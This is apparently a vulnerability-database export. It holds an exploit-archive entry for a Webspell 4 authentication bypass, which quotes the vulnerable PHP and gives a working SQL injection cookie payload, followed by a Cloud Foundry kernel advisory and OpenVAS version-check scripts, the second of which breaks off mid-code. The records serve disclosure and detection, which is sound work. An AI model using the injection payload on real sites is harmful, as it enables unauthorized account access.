{"hash": "5b768228654b30091d4c53b6a6c425a32ef476265c9fc0515972296822b83a1a", "id": "1337DAY-ID-4594", "lastseen": "2018-03-11T01:10:00", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ee43afdb84ed7cbc2768aa19f785512e", "key": "href"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "modified"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "4c0250142a1f9257b18f040d3c5103f3", "key": "sourceData"}, {"hash": "167a287a41e8d4627b7829f39d9558fe", "key": "sourceHref"}, {"hash": "8ddfff8606576b32069f96f65dd71334", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-26798", "1337DAY-ID-24887", "1337DAY-ID-24882", "1337DAY-ID-9521"]}, {"type": "cve", "idList": ["CVE-2015-4594"]}, {"type": "nessus", "idList": ["APPLETV_9_2_2.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:39402"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135533"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:4594", "SECURITYVULNS:VULN:2852"]}], "modified": "2018-03-11T01:10:00"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4594", "description": "Exploit for unknown platform in category web applications", "title": "Webspell 4 (Auth Bypass) SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "efd5f079e7cef6cd1407fb995dfefd412b2d52be8b63cda3b24963f682dd9cc5", "id": "1337DAY-ID-4594", "lastseen": "2016-04-20T00:53:42", "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T00:53:42"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8934742e7a8f58285232341e99256ad0", "key": "sourceHref"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "published"}, {"hash": "8ddfff8606576b32069f96f65dd71334", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "modified"}, {"hash": "bab414f2c90e6fdf0fe3b539f77ae9f3", "key": "sourceData"}, {"hash": "5ac8c50ee8dcb67324314d58f44dc9be", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/4594", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Webspell 4 (Auth Bypass) SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nWebspell 4 (Auth Bypass) SQL Injection Vulnerability\r\n====================================================\r\n\r\n\r\n#Webspell Login Bypass\r\n#Found by: h0yt3r\r\n#\r\n##\r\n#Checklogin.php Line 60:\r\n#\r\n# setcookie(\"ws_auth\", $ds['userID'].\":\".$ws_pwd, time()+($sessionduration*60*60));\r\n# $login = 1;\r\n#\r\n##\r\n#_functions.php Line 253:\r\n#\r\n# $login_per_cookie = false;\r\n# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {\r\n# $login_per_cookie = true;\r\n# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\n# }\r\n##\r\n#src/login.php:\r\n#\r\n# global $userID, $loggedin;\r\n#\r\n# $userID = 0;\r\n# $loggedin=false;\r\n#\r\n# if(isset($_SESSION['ws_auth'])) {\r\n# if(stristr($_SESSION['ws_auth'], \"userid\")===FALSE){\r\n# $authent = explode(\":\", $_SESSION['ws_auth']);\r\n# $ws_user = sprintf('%u', $authent[0]);\r\n#\r\n# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???\r\n# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n#\r\n# if(isset($ws_user) AND isset($ws_pwd)) {\r\n#\r\n# $check = safe_query(\"SELECT userID FROM \".PREFIX.\"user WHERE userID='$ws_user' AND password='$ws_pwd'\");\r\n#\r\n# while($ds=mysql_fetch_array($check)) {\r\n# $loggedin=true;\r\n# $userID=$ds['userID'];\r\n# }\r\n# }\r\n# } else die();\r\n# }\r\n# ?>\r\n#\r\n#\r\n####\r\n\r\n// ws_pwd must be a string without spaces and with a maximum length of 32\r\n $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n\r\nWuta fuck is dis crap?!\r\n$_COOKIE['ws_auth'] can be exploited by somting like dis:\r\n1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)\r\nAnd btw:\r\n$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\nSo dont foget to delete teh session...\r\nBad thing: Only works wit magic_quotes == off\r\n\r\nBut they got some function:\r\n#_functions.php:74\r\n#function sql_quote($value) {\r\n#\r\n# if( get_magic_quotes_gpc() ) {\r\n# $value = stripslashes( $value );\r\n# }\r\n# if( function_exists( \"mysql_real_escape_string\" ) ) {\r\n# $value = mysql_real_escape_string( $value );\r\n# }\r\n# else\r\n# {\r\n# $value = addslashes( $value );\r\n# }\r\n# return $value;\r\n#}\r\nAnd why in the world isnt it used?!\r\n\r\n~END~\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2009-01-03T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2009-01-03T00:00:00", "href": "http://0day.today/exploit/description/4594"}, "lastseen": "2016-04-20T00:53:42", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nWebspell 4 (Auth Bypass) SQL Injection Vulnerability\r\n====================================================\r\n\r\n\r\n#Webspell Login Bypass\r\n#Found by: h0yt3r\r\n#\r\n##\r\n#Checklogin.php Line 60:\r\n#\r\n# setcookie(\"ws_auth\", $ds['userID'].\":\".$ws_pwd, time()+($sessionduration*60*60));\r\n# $login = 1;\r\n#\r\n##\r\n#_functions.php Line 253:\r\n#\r\n# $login_per_cookie = false;\r\n# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {\r\n# $login_per_cookie = true;\r\n# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\n# }\r\n##\r\n#src/login.php:\r\n#\r\n# global $userID, $loggedin;\r\n#\r\n# $userID = 0;\r\n# $loggedin=false;\r\n#\r\n# if(isset($_SESSION['ws_auth'])) {\r\n# if(stristr($_SESSION['ws_auth'], \"userid\")===FALSE){\r\n# $authent = explode(\":\", $_SESSION['ws_auth']);\r\n# $ws_user = sprintf('%u', $authent[0]);\r\n#\r\n# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???\r\n# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n#\r\n# if(isset($ws_user) AND isset($ws_pwd)) {\r\n#\r\n# $check = safe_query(\"SELECT userID FROM \".PREFIX.\"user WHERE userID='$ws_user' AND password='$ws_pwd'\");\r\n#\r\n# while($ds=mysql_fetch_array($check)) {\r\n# $loggedin=true;\r\n# $userID=$ds['userID'];\r\n# }\r\n# }\r\n# } else die();\r\n# }\r\n# ?>\r\n#\r\n#\r\n####\r\n\r\n// ws_pwd must be a string without spaces and with a maximum length of 32\r\n $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n\r\nWuta fuck is dis crap?!\r\n$_COOKIE['ws_auth'] can be exploited by somting like dis:\r\n1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)\r\nAnd btw:\r\n$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\nSo dont foget to delete teh session...\r\nBad thing: Only works wit magic_quotes == off\r\n\r\nBut they got some function:\r\n#_functions.php:74\r\n#function sql_quote($value) {\r\n#\r\n# if( get_magic_quotes_gpc() ) {\r\n# $value = stripslashes( $value );\r\n# }\r\n# if( function_exists( \"mysql_real_escape_string\" ) ) {\r\n# $value = mysql_real_escape_string( $value );\r\n# }\r\n# else\r\n# {\r\n# $value = addslashes( $value );\r\n# }\r\n# return $value;\r\n#}\r\nAnd why in the world isnt it used?!\r\n\r\n~END~\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-10] #", "published": "2009-01-03T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2009-01-03T00:00:00", "href": "https://0day.today/exploit/description/4594"}

{"cloudfoundry": [{"lastseen": "2018-09-11T21:26:18", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.74\n * 3421.x versions prior to 3421.81\n * 3445.x versions prior to 3445.66\n * 3468.x versions prior to 3468.67\n * 3541.x versions prior to 3541.46\n * 3586.x versions prior to 3586.40\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3363.x versions to 3363.74\n * Upgrade 3421.x versions to 3421.81\n * Upgrade 3445.x versions to 3445.66\n * Upgrade 3468.x versions to 3468.67\n * Upgrade 3541.x versions to 3541.46\n * Upgrade 3586.x versions to 3586.40\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3753-2](<https://usn.ubuntu.com/3753-2>)\n * [CVE-2017-13168](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13168>)\n * [CVE-2018-10876](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10876>)\n * [CVE-2018-10877](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10877>)\n * [CVE-2018-10878](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10878>)\n * [CVE-2018-10879](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10879>)\n * [CVE-2018-10881](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10881>)\n * [CVE-2018-10882](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-10882>)\n * [CVE-2018-12233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12233>)\n * [CVE-2018-13094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13094>)\n * [CVE-2018-13405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13405>)\n * [CVE-2018-13406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13406>)\n", "modified": "2018-09-11T00:00:00", "published": "2018-09-11T00:00:00", "id": "CFOUNDRY:CD984900F2B581632FB9816EFFC5EA33", "href": "https://www.cloudfoundry.org/blog/usn-3753-2/", "title": "USN-3753-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-03-14T14:18:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-08-25T00:00:00", "id": "OPENVAS:1361412562310843627", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843627", "title": "Ubuntu Update for linux USN-3753-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3753_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3753-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843627\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-25 06:47:37 +0200 (Sat, 25 Aug 2018)\");\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10879\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10882\", \"CVE-2018-10881\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3753-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use this\nto construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem\nimplementation in the Linux kernel. An attacker could use this to construct\na malicious ext4 image that, when mounted, could cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4 image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the\nLinux kernel contained a buffer overflow when handling extended attributes.\nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file\ncreation when performed by a non-member of the group. A local attacker\ncould use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the\nLinux kernel contained an integer overflow. A local attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-13406)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3753-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3753-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-kvm\", ver:\"4.4.0-1032.38\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1066-aws\", ver:\"4.4.0-1066.76\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1095-raspi2\", ver:\"4.4.0-1095.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1099-snapdragon\", ver:\"4.4.0-1099.104\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-generic-lpae\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-lowlatency\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-e500mc\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc-smp\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-emb\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-134-powerpc64-smp\", ver:\"4.4.0-134.160\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1066.68\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1032.31\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.134.140\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1095.95\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1099.91\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-14T14:17:32", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-08-25T00:00:00", "id": "OPENVAS:1361412562310843626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843626", "title": "Ubuntu Update for linux-aws USN-3753-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3753_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3753-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843626\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-25 06:46:31 +0200 (Sat, 25 Aug 2018)\");\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10879\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10882\", \"CVE-2018-10881\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3753-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use this\nto construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem\nimplementation in the Linux kernel. An attacker could use this to construct\na malicious ext4 image that, when mounted, could cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4 image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the\nLinux kernel contained a buffer overflow when handling extended attributes.\nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file\ncreation when performed by a non-member of the group. A local attacker\ncould use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the\nLinux kernel contained an integer overflow. A local attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-13406)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3753-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3753-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1028-aws\", ver:\"4.4.0-1028.31\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n 